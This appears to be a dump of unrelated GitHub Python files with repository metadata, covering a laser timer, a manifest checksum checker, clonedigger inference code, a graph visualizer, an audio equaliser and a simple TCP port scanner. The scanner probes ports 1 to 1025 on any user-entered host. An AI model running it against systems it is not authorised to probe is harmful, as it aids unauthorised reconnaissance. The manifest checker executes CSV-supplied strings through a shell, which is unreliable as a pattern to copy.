True) \n\nclass Laser_run(QThread):\n\n def __init__(self):\n super().__init__()\n\n def run(self):\n \n while True:\n\n # Laser usage time data\n\n f = open(\"Setting_Laser.txt\",'r')\n self.LaserHour1 = f.readline()\n self.LaserMin1 = f.readline()\n self.LaserSec1 = f.readline()\n\n self.LaserHour = float(self.LaserHour1)\n self.LaserMin = float(self.LaserMin1)\n self.LaserSec = float(self.LaserSec1)\n\n f.close()\n# print(\"1:\", \"%d\" %self.LaserHour, \"%d\" %self.LaserMin, \"%d\" %self.LaserSec)\n\n if self.LaserSec < 59:\n self.LaserSec += 1\n elif self.LaserSec == 59:\n self.LaserSec = 0\n if self.LaserMin < 59:\n self.LaserMin += 1\n elif self.LaserMin == 59:\n self.LaserMin = 0\n self.LaserHour += 1\n\n# print(\"%d\" %self.LaserHour, \"%d\" %self.LaserMin, \"%d\" %self.LaserSec)\n\n f = open(\"Setting_Laser.txt\", 'w')\n\n f.write('%d\\n' %int(self.LaserHour))\n f.write('%d\\n' %int(self.LaserMin))\n f.write('%d\\n' %int(self.LaserSec))\n f.close()\n\n time.sleep(1)\n\n# print(\"%d\\n\"%self.LaserHour,\"%d\\n\"%self.LaserMin,\"%d\"%self.LaserSec)\n\n \n\n\n\n\n\n \n\n \n\n\n","repo_name":"HyungJae-Lim/Project1-Rapid-Urinary-Tract-Infection","sub_path":"Bacometer_Code/CODE/Laser_Run.py","file_name":"Laser_Run.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39755038604","text":"import csv\nimport os\nimport subprocess\nimport argparse\nimport sys\n\ndef usage():\n print('check_manifest.py')\n\n\nif __name__ == '__main__':\n debug = False\n\n#manifest_file = \"{0}/{1}/foundry/manifest-{1}.csv\".format(os.environ[\"TAPEOUT_ROOT\"], os.environ[\"SHUTTLE\"])\nmanifest_file = sys.argv[1]\n\nwith open( manifest_file, \"r\" ) as f:\n reader = csv.reader(f, delimiter=\",\", skipinitialspace=True)\n for i, line in enumerate(reader):\n if i != 0 and line[2] != 'TEST':\n if os.path.splitext(line[10].split('>')[1])[1] == '.gz':\n # p3 = subprocess.Popen( \"gunzip -c\", stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True )\n p2 = subprocess.Popen( \"gunzip -c | shasum\", stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True )\n p1 = subprocess.Popen( line[10].split('>')[0], stdout=p2.stdin, stderr=subprocess.PIPE, shell=True )\n else:\n p2 = subprocess.Popen( \"shasum\", stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True )\n p1 = subprocess.Popen( line[10].split('>')[0], stdout=p2.stdin, stderr=subprocess.PIPE, shell=True )\n stdout, stderr = p2.communicate()\n output = stdout.decode('utf-8')\n if output:\n hash = output.split(' ')[0]\n if hash == line[9]:\n check = '-- Matched-- '\n else:\n check = '** Error **'\n\n print(\"{:02}: slot = {}, project = {:<15}, id = {}, shasum = {} | {}\".format(i, line[1], line[2][:15], line[3][1:], line[9], check))\n\n\n\n\n\n\n","repo_name":"mithro/mpw-tools","sub_path":"efabless/check_manifest.py","file_name":"check_manifest.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"37260526219","text":"from __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import next\nfrom builtins import str\nfrom builtins import *\nfrom builtins import object\nfrom __future__ import generators\n\n__doctype__ = \"restructuredtext en\"\n\nfrom clonedigger.logilab.common.compat import chain, imap\n\n# WARNING: internal imports order matters !\n\nfrom clonedigger.logilab.astng._exceptions import *\n\n\nclass InferenceContext(object):\n __slots__ = ('startingfrom', 'path', 'lookupname', 'callcontext', 'boundnode')\n \n def __init__(self, node=None, path=None):\n self.startingfrom = node # XXX useful ?\n if path is None:\n self.path = []\n else:\n self.path = path\n self.lookupname = None\n self.callcontext = None\n self.boundnode = None\n\n def push(self, node):\n name = self.lookupname\n if (node, name) in self.path:\n raise StopIteration()\n self.path.append( (node, name) )\n\n def pop(self):\n return self.path.pop()\n\n def clone(self):\n # XXX copy lookupname/callcontext ?\n clone = InferenceContext(self.startingfrom, self.path)\n clone.callcontext = self.callcontext\n clone.boundnode = self.boundnode\n return clone\n\n\ndef unpack_infer(stmt, context=None):\n \"\"\"return an iterator on nodes infered by the given statement\n if the infered value is a list or a tuple, recurse on it to\n get values infered by its content\n \"\"\"\n if isinstance(stmt, (List, Tuple)):\n # XXX loosing context\n return chain(*map(unpack_infer, stmt.nodes))\n infered = next(stmt.infer(context))\n if infered is stmt:\n return iter( (stmt,) )\n return chain(*map(unpack_infer, stmt.infer(context)))\n\ndef copy_context(context):\n if context is not None:\n return context.clone()\n else:\n return InferenceContext()\n \ndef _infer_stmts(stmts, context, frame=None):\n \"\"\"return an iterator on statements infered by each statement in \n \"\"\"\n stmt = None\n infered = False\n if context is not None:\n name = context.lookupname\n context = context.clone()\n else:\n name = None\n context = InferenceContext()\n for stmt in stmts:\n if stmt is YES:\n yield stmt\n infered = True\n continue\n context.lookupname = stmt._infer_name(frame, name)\n try:\n for infered in stmt.infer(context):\n yield infered\n infered = True\n except UnresolvableName:\n continue\n except InferenceError:\n yield YES\n infered = True\n if not infered:\n raise InferenceError(str(stmt))\n\n# special inference objects ###################################################\n\nclass Yes(object):\n \"\"\"a yes object\"\"\"\n def __repr__(self):\n return 'YES'\n def __getattribute__(self, name):\n return self\n def __call__(self, *args, **kwargs):\n return self\nYES = Yes()\n\nclass Proxy(object):\n \"\"\"a simple proxy object\"\"\"\n def __init__(self, proxied):\n self._proxied = proxied\n\n def __getattr__(self, name):\n return getattr(self._proxied, name)\n\n def infer(self, context=None):\n yield self\n\n\nclass InstanceMethod(Proxy):\n \"\"\"a special node representing a function bound to an instance\"\"\"\n def __repr__(self):\n instance = self._proxied.parent.frame()\n return 'Bound method %s of %s.%s' % (self._proxied.name,\n instance.root().name,\n instance.name)\n __str__ = __repr__\n\n def is_bound(self):\n return True\n\n\nclass Instance(Proxy):\n \"\"\"a special node representing a class instance\"\"\"\n def getattr(self, name, context=None, lookupclass=True):\n try:\n return self._proxied.instance_attr(name, context)\n except NotFoundError:\n if name == '__class__':\n return [self._proxied]\n if name == '__name__':\n # access to __name__ gives undefined member on class\n # instances but not on class objects\n raise NotFoundError(name)\n if lookupclass:\n return self._proxied.getattr(name, context)\n raise NotFoundError(name)\n\n def igetattr(self, name, context=None):\n \"\"\"infered getattr\"\"\"\n try:\n # XXX frame should be self._proxied, or not ?\n return _infer_stmts(\n self._wrap_attr(self.getattr(name, context, lookupclass=False)),\n context, frame=self)\n except NotFoundError:\n try:\n # fallback to class'igetattr since it has some logic to handle\n # descriptors\n return self._wrap_attr(self._proxied.igetattr(name, context))\n except NotFoundError:\n raise InferenceError(name)\n \n def _wrap_attr(self, attrs):\n \"\"\"wrap bound methods of attrs in a InstanceMethod proxies\"\"\"\n # Guess which attrs are used in inference.\n def wrap(attr):\n if isinstance(attr, Function) and attr.type == 'method':\n return InstanceMethod(attr)\n else:\n return attr\n return map(wrap, attrs)\n \n def infer_call_result(self, caller, context=None):\n \"\"\"infer what's a class instance is returning when called\"\"\"\n infered = False\n for node in self._proxied.igetattr('__call__', context):\n for res in node.infer_call_result(caller, context):\n infered = True\n yield res\n if not infered:\n raise InferenceError()\n\n def __repr__(self):\n return 'Instance of %s.%s' % (self._proxied.root().name,\n self._proxied.name)\n __str__ = __repr__\n \n def callable(self):\n try:\n self._proxied.getattr('__call__')\n return True\n except NotFoundError:\n return False\n\n def pytype(self):\n return self._proxied.qname()\n \nclass Generator(Proxy): \n \"\"\"a special node representing a generator\"\"\"\n def callable(self):\n return True\n \n def pytype(self):\n return '__builtin__.generator'\n\n# imports #####################################################################\n\nfrom clonedigger.logilab.astng.manager import ASTNGManager, Project, Package\nMANAGER = ASTNGManager()\n\nfrom clonedigger.logilab.astng.nodes import *\nfrom clonedigger.logilab.astng import nodes\nfrom clonedigger.logilab.astng.scoped_nodes import *\nfrom clonedigger.logilab.astng import inference\nfrom clonedigger.logilab.astng import lookup\nlookup._decorate(nodes)\n\nList._proxied = MANAGER.astng_from_class(list)\nList.__bases__ += (inference.Instance,)\nList.pytype = lambda x: '__builtin__.list'\n\nTuple._proxied = MANAGER.astng_from_class(tuple)\nTuple.__bases__ += (inference.Instance,)\nTuple.pytype = lambda x: '__builtin__.tuple'\n\nDict.__bases__ += (inference.Instance,)\nDict._proxied = MANAGER.astng_from_class(dict)\nDict.pytype = lambda x: '__builtin__.dict'\n\nbuiltin_astng = Dict._proxied.root()\n\nConst.__bases__ += (inference.Instance,)\nConst._proxied = None\ndef Const___getattr__(self, name):\n if self.value is None:\n raise AttributeError(name)\n if self._proxied is None:\n self._proxied = MANAGER.astng_from_class(self.value.__class__)\n return getattr(self._proxied, name)\nConst.__getattr__ = Const___getattr__\ndef Const_getattr(self, name, context=None, lookupclass=None):\n if self.value is None:\n raise NotFoundError(name)\n if self._proxied is None:\n self._proxied = MANAGER.astng_from_class(self.value.__class__)\n return self._proxied.getattr(name, context)\nConst.getattr = Const_getattr\nConst.has_dynamic_getattr = lambda x: False\n\ndef Const_pytype(self):\n if self.value is None:\n return '__builtin__.NoneType'\n if self._proxied is None:\n self._proxied = MANAGER.astng_from_class(self.value.__class__)\n return self._proxied.qname()\nConst.pytype = Const_pytype\n","repo_name":"jlachowski/clonedigger","sub_path":"clonedigger/logilab/astng/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"10303495533","text":"'''\r\nFirst written by Dennis Wang,\r\nmodified by Santi Santichaivekin (Feb 28, 19).\r\n'''\r\n\r\nimport networkx as nx\r\n\r\nEXAMPLE1 = {\r\n ('p1', 'h1'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p2', 'h3'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p3', 'h2'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p4', 'h4'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p6', 'h7'): [['S', ('p7', 'h1'), ('p8', 'h2'), 0.5], 2],\r\n ('p6', 'h8'): [['S', ('p7', 'h3'), ('p8', 'h4'), 0.5], 2],\r\n ('p7', 'h1'): [['T', ('p1', 'h1'), ('p2', 'h3'), 0.5], 1],\r\n ('p7', 'h3'): [['T', ('p2', 'h3'), ('p1', 'h1'), 0.5], 1],\r\n ('p8', 'h2'): [['T', ('p3', 'h2'), ('p4', 'h4'), 0.5], 1],\r\n ('p8', 'h4'): [['T', ('p4', 'h4'), ('p3', 'h2'), 0.5], 1]\r\n}\r\n\r\nEXAMPLE2 = {\r\n ('p1', 'h1'): [('C', (None, None), (None, None))],\r\n ('p2', 'h3'): [('C', (None, None), (None, None))],\r\n ('p3', 'h2'): [('C', (None, None), (None, None))],\r\n ('p4', 'h4'): [('C', (None, None), (None, None))],\r\n ('p6', 'h7'): [('S', ('p7', 'h1'), ('p8', 'h2'))],\r\n ('p6', 'h8'): [('S', ('p7', 'h3'), ('p8', 'h4'))],\r\n ('p7', 'h1'): [('T', ('p1', 'h1'), ('p2', 'h3'))],\r\n ('p7', 'h3'): [('T', ('p2', 'h3'), ('p1', 'h1'))],\r\n ('p8', 'h2'): [('T', ('p3', 'h2'), ('p4', 'h4'))],\r\n ('p8', 'h4'): [('T', ('p4', 'h4'), ('p3', 'h2'))]\r\n}\r\n\r\ndef eventNodeType(eventNode):\r\n '''\r\n Returns 'S', 'T', 'D', L', or 'C'\r\n 'S': speciation\r\n 'D': duplication\r\n 'T': transfer\r\n 'L': loss\r\n 'C': end event\r\n '''\r\n return eventNode[0]\r\n\r\ndef mappingNodeToStr(mappingNode):\r\n return \"{}-{}\".format(mappingNode[0], mappingNode[1])\r\n\r\ndef firstChild(eventNode):\r\n # ['T', ('p3', 'h2'), ('p4', 'h4'), 0.5]\r\n # returns a mapping node\r\n assert(eventNode[1][0] and eventNode[1][1])\r\n return eventNode[1]\r\n\r\ndef secondChild(eventNode):\r\n # ['T', ('p3', 'h2'), ('p4', 'h4'), 0.5]\r\n # ['C', (None, None), (None, None), 1.0]\r\n # returns a mapping node\r\n # do not use on null entities\r\n assert(eventNode[2][0] and eventNode[2][1])\r\n return eventNode[2]\r\n\r\ndef eventNodeToStr(eventNode):\r\n # ('S', ('p7', 'h1'), ('p8', 'h2'), 0.5], 2)\r\n # ('S', ('n32', 'm143'), ('n31', 'm144'))\r\n if eventNodeType(eventNode) == 'S':\r\n return \"spec | {}-{}, {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n eventNode[2][0], eventNode[2][1]\r\n )\r\n elif eventNodeType(eventNode) == 'T':\r\n return \"tran | {}-{}, {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n eventNode[2][0], eventNode[2][1]\r\n )\r\n elif eventNodeType(eventNode) == 'D':\r\n return \"dupl | {}-{}, {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n eventNode[2][0], eventNode[2][1]\r\n )\r\n elif eventNodeType(eventNode) == 'L':\r\n return \"loss | {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n )\r\n if eventNodeType(eventNode) == 'C':\r\n return \"END\"\r\n\r\ndef edgesFromReconciliationGraph(dtlGraph):\r\n outputEdgesList = []\r\n for mappingNode, eventNodes in dtlGraph.items():\r\n mappingNodeName = mappingNodeToStr(mappingNode)\r\n for eventNode in eventNodes :\r\n # check whether this is an event node or just\r\n # extra data -- SEE EXAMPLE1\r\n try:\r\n assert eventNode[0] in ['S', 'T', 'D', 'L', 'C']\r\n except:\r\n continue\r\n\r\n eventNodeName = eventNodeToStr(eventNode)\r\n # we do not have to insert the end event to\r\n # the visualization\r\n if eventNodeType(eventNode) == 'C':\r\n pass\r\n # loss has only one children\r\n elif eventNodeType(eventNode) == 'L':\r\n outputEdgesList.append((mappingNodeName, eventNodeName))\r\n\r\n nextMappingNodeName = mappingNodeToStr(firstChild(eventNode))\r\n outputEdgesList.append((eventNodeName, nextMappingNodeName))\r\n # other types have two children\r\n else:\r\n outputEdgesList.append((mappingNodeName, eventNodeName))\r\n \r\n nextMappingNodeName0 = mappingNodeToStr(firstChild(eventNode))\r\n outputEdgesList.append((eventNodeName, nextMappingNodeName0))\r\n nextMappingNodeName1 = mappingNodeToStr(secondChild(eventNode))\r\n outputEdgesList.append((eventNodeName, nextMappingNodeName1))\r\n\r\n return outputEdgesList\r\n\r\ndef visualizeAndSave(dtlGraph, targetFile):\r\n '''\r\n Receives that graph part of the reconciliation graph.\r\n Visualizes it and saves it to targetfile.\r\n\r\n Note: targetfile must ends with .png\r\n '''\r\n assert(targetFile.endswith(\".png\"))\r\n # creates an empty graph\r\n nxDtlGraph = nx.DiGraph()\r\n # add edges -- note that the library already perfers to place\r\n # topoligically lower nodes on the top\r\n nxDtlGraph.add_edges_from(edgesFromReconciliationGraph(dtlGraph))\r\n pydotDtlGraph = nx.drawing.nx_pydot.to_pydot(nxDtlGraph)\r\n pydotDtlGraph.write_png(targetFile)\r\n\r\nif __name__ == '__main__' :\r\n visualizeAndSave(EXAMPLE1, \"example1.png\")\r\n visualizeAndSave(EXAMPLE2, \"example2.png\")","repo_name":"ssantichaivekin/hmc-reconciliation-graph","sub_path":"ReconciliationVisualization.py","file_name":"ReconciliationVisualization.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26562934351","text":"import socket\r\nimport datetime\r\n\r\ntext_file = open(\"Ced's Port Scanner.txt\", \"w\")\r\ntext_file.write(\"Welcome join the scan \\n\\n\")\r\n\r\nserver = input(\"enter target to scan: \")\r\nip = socket.gethostbyname(server)\r\n\r\nprint(server)\r\nprint(ip)\r\n\r\nt1 = datetime.datetime.now()\r\ntext_file.write(\"Current datetime :\" + str(t1) + \"\\n\\n\")\r\n\r\n\r\ndef scan(targetip):\r\n x = 1\r\n for x in range(1, 1026):\r\n\r\n s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)\r\n s.settimeout(.25)\r\n a = s.connect_ex((targetip, x))\r\n print(a)\r\n if a == 0:\r\n print(\"Port \" + str(x) + \" is open!!!!!!!\")\r\n text_file.write(\"Port {} is open \\n\\n\".format(x))\r\n\r\n else:\r\n print(\"Port \" + str(x) + \" isn't available\")\r\n x += 1\r\n\r\n\r\nscan(ip)\r\n\r\nt2 = datetime.datetime.now()\r\n\r\ntext_file.write(\"Ending datetime :\" + str(t2) + \"\\n\\n\")\r\nprint(\"Ending datetime :\" + str(t2) + \"\\n\\n\")\r\ntotal = t2 - t1\r\n\r\nprint(\"Scan completed in: \", total)\r\ntext_file.write(\"Scan completed in: \" + str(total))\r\ntext_file.close()\r\n\r\n","repo_name":"cnorfleet97/python-port-scanner-","sub_path":"cedrics_port_scanner.py","file_name":"cedrics_port_scanner.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22394806187","text":"# coding:utf-8\n\nimport json\nimport codecs\nimport urllib\n# 网页数据输出器,输出有价值的数据到文件中\n\nclass HtmlOutputer(object):\n\n def __init__(self):\n self.datas = []\n\n # 收集数据到数组中,数组中的每个数据都是一个 json 数据\n def collect_data(self, data):\n if data is None:\n return\n self.datas.append(data)\n\n # 输出 json 数据信息\n def output_json_info(self,data):\n json_str = json.dumps(data,ensure_ascii=False,indent=4)\n print(json_str)\n \n\n # 输出数据到 json 文件中\n def output_json(self):\n with codecs.open(\"out.json\",\"w\",'utf-8') as f:\n\n json.dump(self.datas,f,ensure_ascii=False,indent=4)\n print(\"加载入文件完成...\")\n \n \n # 输出数据到 html 文件中\n def output_html(self):\n \n fout = open('output.html','w')\n\n fout.write('')\n fout.write(\"\")\n fout.write(\"\")\n\n for data in self.datas:\n fout.write(\"\")\n fout.write(\"\" % data['url'])\n fout.write(\"\" % data['title'].encode('utf-8'))\n fout.write(\"\" % data['summary'].encode('utf-8'))\n fout.write(\"\")\n\n fout.write(\"
    %s%s%s
    \")\n fout.write(\"\")\n fout.write(\"\")\n\n fout.close()\n","repo_name":"fuyi501/pySpiders","sub_path":"baiduBaike/html_outputer.py","file_name":"html_outputer.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"20137390402","text":"from typing import List\n\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n \"\"\"\n Idea:\n This is actually a stacked 1D sorted array\n binary search but map 1D pointers to rows can cols\n \"\"\"\n rows, cols = len(matrix), len(matrix[0])\n left, right = 0, rows * cols - 1\n while left <= right:\n mid = (left + right) // 2\n r, c = mid // cols, mid % cols\n if matrix[r][c] == target:\n return True\n elif matrix[r][c] > target:\n right = mid - 1\n else:\n left = mid + 1\n\n return False\n\n\nif __name__ == '__main__':\n matrix = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 60]]\n target = 5\n sol = Solution()\n print(sol.searchMatrix(matrix, target))\n","repo_name":"Rocky-Zhenxiang-Fang/LeetCode","sub_path":"74. Search a 2D Matrix.py","file_name":"74. Search a 2D Matrix.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2279282156","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020-03-21 16:17:17\n# @Author : mutudeh (josephmathone@gmail.com)\n# @Link : ${link}\n# @Version : $Id$\n\n\nclass Solution(object):\n def getKth(self, lo, hi, k):\n weights = []\n for i in range(lo,hi+1):\n weights.append([self.get_weight(i),i])\n weights = sorted(weights,key = lambda x:(x[0],x[1]))\n print(weights)\n return weights[k-1][1]\n\n def get_weight(self,num):\n steps = 0\n while num != 1:\n if num & 1 == 1:\n # 如果是奇数\n num = 3*num + 1\n else:\n num //= 2\n steps += 1\n return steps\n\ns = Solution()\nprint(s.getKth(7,11,4))\n\n ","repo_name":"joseph-mutu/Codes-of-Algorithms-and-Data-Structure","sub_path":"Leetcode/5350. 将整数按权重排序.py","file_name":"5350. 将整数按权重排序.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73923574970","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 10 15:12:54 2019\r\n\r\n@authors: Katarzyna Lenard - 2218524L & Mustafa Biyikli - 2190523B\r\n\"\"\"\r\n\r\nimport scipy.io.wavfile as wavfile\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nFs, x_t = wavfile.read(\"original.wav\") # Load the audio sample\r\nx_t = x_t[:, 1] / 2**15 # Reduce to single-channel and normalise the signal (16-bit recording)\r\nx_t = x_t[50000 : len(x_t)-35000] # Remove muted sections [beginning & end]\r\nresolution = Fs/len(x_t)\r\nmargin = -75 # Margin line on amplitude[dB]/frequency[Hz] graph\r\ny = np.linspace(margin, margin, len(x_t)) # This is to plot the margin line later on\r\nfigManager = plt.get_current_fig_manager()\r\nfigManager.resize(*figManager.window.maxsize())\t # Load the plots in a maximised window (changed for Linux)\r\nSM58_mimic = [] # This is used to plot the enhancer frequency response by appending ramp values to it\r\n\r\n# Plot the audio signal against time, add title and name x & y axes\r\ntime = np.linspace(0, len(x_t)/Fs, num=len(x_t)) # Create an array of time[s] using number of samples\r\nplt.subplot(321, facecolor=\"white\") and plt.plot(time, x_t, \"black\", linewidth=0.5)\r\nplt.title(\"Original Audio Signal [Time Domain]\", loc=\"center\")\r\nplt.ylabel(\"Amplitude\") and plt.xlabel(\"Time [s]\")\r\nplt.xlim(0, len(x_t)/Fs) and plt.ylim(-0.5, 0.5)\r\nplt.grid()\r\n\r\n# Plot the audio signal against frequency, add title and name x & y axes\r\nx_f = np.fft.fft(x_t) # Forward FT: Time Domain -> Frequency Domain; Make data sample size independent\r\nx_f_plot = 20*np.log10(np.fft.fft(x_t)/len(x_t)) # Discrete FT for the plot\r\nx_f_dB = 20*np.log10(x_f) # Convert to dB\r\nfrequency = np.linspace(0, Fs, len(x_t)) # Create an array of frequency[Hz] using Nyquist Theorem of Fmax <= Fs/2\r\nplt.subplot(322, facecolor=\"white\") and plt.plot(frequency, np.real(x_f_plot), \"black\", linewidth=0.5)\r\nplt.xscale(\"log\")\r\nplt.title(\"Original Audio Signal [Frequency Domain]\", loc=\"center\")\r\nplt.ylabel(\"Amplitude [dB]\") and plt.xlabel(\"Frequency [Hz]\")\r\nplt.ylim(-200, -40)\r\nplt.xlim(1, Fs/2) # Exclude the mirrored part from the log scale start is 1 as 10**0 = 1\r\nplt.grid()\r\nplt.plot(frequency, y, \"k--\", linewidth=0.5) # This is the margin line\r\n\r\n#Apply a High Pass Filter (50Hz)\r\nh1 = int(len(x_f_dB)/Fs*0)\r\nh2 = int(len(x_f_dB)/Fs*50)\r\nx_f_dB[h1 : h2+1] = 0\r\nx_f_dB[len(x_f_dB)-h2 : len(x_f_dB)-h1+1] = 0\r\n\r\n# Apply a Low Pass Filter (15kHz)\r\nl1 = int(len(x_f_dB)/Fs*1.5e4)\r\nl2 = int(len(x_f_dB)/Fs*Fs/2)\r\nx_f_dB[l1 : l2+1] = 0\r\nx_f_dB[len(x_f_dB)-l2 : len(x_f_dB)-l1+1] = 0\r\n\r\n# 50Hz to 100Hz Region, SHURE SM-58 frequency response manipulation (Remove +8dB from 50Hz and 0dB from 100: linear correlation)\r\nfor harmonics in np.arange(50, 1e2, resolution):\r\n ramp = harmonics*8/50 - 16 \r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n\r\n# Leave 100Hz to 1kHz region untouched\r\nfor harmonics in np.arange(1e2, 1e3, resolution):\r\n ramp = 0 \r\n # Uncomment the following if fundemetal region is to be modified; change ramp value as desired\r\n '''\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n '''\r\n SM58_mimic.append(ramp)\r\n\r\n# 1kHz to 5.5kHz Region, SHURE SM-58 frequency response manipulation (Add 0dB to 1kHz and +5dB to 5.5kHz: linear correlation)\r\nfor harmonics in np.arange(1e3, 5.5e3, resolution):\r\n ramp = harmonics/900 - 10/9 \r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n \r\n# 5.5kHz to 6kHz Region, SHURE SM-58 frequency response manipulation (Add +5dB from 5kHz to 6kHz: linear correlation)\r\nfor harmonics in np.arange(5.5e3, 6e3, resolution):\r\n ramp = 5 \r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n \r\n# 6kHz to 8kHz Region, SHURE SM-58 frequency response manipulation (Add +5dB to 6kHz and +1dB to 8kHz: linear correlation)\r\nfor harmonics in np.arange(6e3, 8e3, resolution):\r\n ramp = 2.4e4*4/harmonics - 11\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n \r\n# 8kHz to 10kHz Region, SHURE SM-58 frequency response manipulation (Add +1dB to 8kHz and +4dB to 10kHz: linear correlation)\r\nfor harmonics in np.arange(8e3, 1e4, resolution):\r\n ramp = harmonics*3/2000 - 11\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n\r\n# 10kHz to 15kHz Region, SHURE SM-58 frequency response manipulation (Add +4dB to 10kHz and remove +7dB from 15kHz: linear correlation)\r\nfor harmonics in np.arange(1e4, 1.5e4, resolution):\r\n ramp = 1.5e4*11/harmonics*2 - 29\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp) \r\n\r\n# Plot the improved audio signal against frequency, add title and name x & y axes\r\nx_f_plot = 10**(x_f_dB/20)\r\nplt.subplot(324, facecolor=\"white\") and plt.plot(frequency, np.real(20*np.log10(x_f_plot/len(x_t))), \"black\", linewidth=0.5)\r\nplt.xscale(\"log\")\r\nplt.title(\"Improved Audio Signal [Frequency Domain]\", loc=\"center\")\r\nplt.ylabel(\"Amplitude [dB]\") and plt.xlabel(\"Frequency [Hz]\")\r\nplt.ylim(-200, -40)\r\nplt.xlim(1, Fs/2) # Remove the mirrored part from the log scale start is 1 as 10**0 = 1\r\nplt.grid()\r\nplt.plot(frequency, y, \"--k\", linewidth=0.5)\r\n\r\n# Transform the improved audio back to time domain\r\nsound_clean = np.fft.ifft((10**(x_f_dB/20))*(2**15)) # Convert back to x[t]\r\nsound_clean = np.real(sound_clean)\r\nsound_clean = np.asarray(sound_clean, dtype=np.int16)\r\n\r\n# Plot the improved audio signal against time, add title and name x & y axes\r\nplt.subplot(323, facecolor=\"white\") and plt.plot(time, sound_clean/2**15, \"black\", linewidth=0.5)\r\nplt.title(\"Improved Auido Signal [Time Domain]\")\r\nplt.ylabel(\"Amplitude\") and plt.xlabel(\"Time [s]\")\r\nplt.xlim(0, len(x_t)/Fs) and plt.ylim(-0.5, 0.5)\r\nplt.grid()\r\n\r\n# Not necessary, plotted just to justify \r\nplt.subplot(325)\r\nplt.specgram(x_t, Fs=Fs)\r\nplt.title(\"Original Audio Spectrogram\")\r\nplt.ylabel(\"Frequency [Hz]\") and plt.xlabel(\"Time [s]\")\r\n\r\n# Plot the enhancer frequency response which shows how the signal is manipulated\r\nplt.subplot(326, facecolor=\"white\") and plt.plot(np.linspace(50, 15000, num=len(SM58_mimic)), SM58_mimic, \"black\", linewidth=2)\r\nplt.xscale(\"log\")\r\nplt.title(\"Enhancer Frequency Response\")\r\nplt.ylabel(\"Manipulation [dB]\") and plt.xlabel(\"Frequency [Hz]\")\r\nplt.xlim(10**0, Fs/2)\r\nxmajor_ticks = [20, 50, 100, 1000, 10000]\r\nymajor_ticks = np.arange(-10, 11, 5)\r\nplt.xticks(xmajor_ticks, xmajor_ticks)\r\nplt.yticks(ymajor_ticks, ymajor_ticks)\r\nplt.tick_params(axis='both', which='major')\r\nplt.grid(which='both', alpha=1)\r\n\r\n# Titles and axes labels overlap, this solves them; could also use plt.tight_layout()\r\nplt.subplots_adjust(wspace=0.25, hspace=0.6)\r\nplt.show()\r\n\r\nwavfile.write(\"improved.wav\", Fs, sound_clean) # Save the improved audio in the same 